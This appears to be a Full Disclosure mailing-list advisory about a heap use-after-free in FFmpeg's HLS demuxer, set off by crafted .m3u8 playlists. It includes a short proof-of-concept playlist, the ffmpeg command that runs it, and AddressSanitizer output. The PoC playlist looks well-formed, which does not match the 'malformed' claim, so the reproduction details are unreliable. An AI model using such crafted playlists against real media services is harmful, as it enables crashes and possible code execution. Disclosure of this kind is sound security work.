Malformed .m3u8 playlists can trigger a heap use-after-free when the HLS demuxer handles segment references. ASan reports access to freed memory inside libavformat/utils.c:528. A crafted .m3u8 could allow remote attackers to achieve denial of service (DoS), information disclosure, or potentially remote code execution depending on heap state. (FFmpeg 7.0-8.0)
*Impact:* - Remote attackers can crash the transcoder with a malicious playlist. - Under certain heap layouts, this may be exploitable for arbitrary code execution. *Proof of Concept:* #EXTM3U #EXTINF:10, dummy.ts UBSAN_OPTIONS=print_stacktrace=1 ASAN_OPTIONS=abort_on_error=1 ./ffmpeg -i malicious.m3u8 -c copy out.mp4 ERROR: AddressSanitizer: heap-use-after-free on address 0x5080000000c8 READ of size 4 freed by thread T0 here: free() previously allocated by thread T0 here: posix_memalign() _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
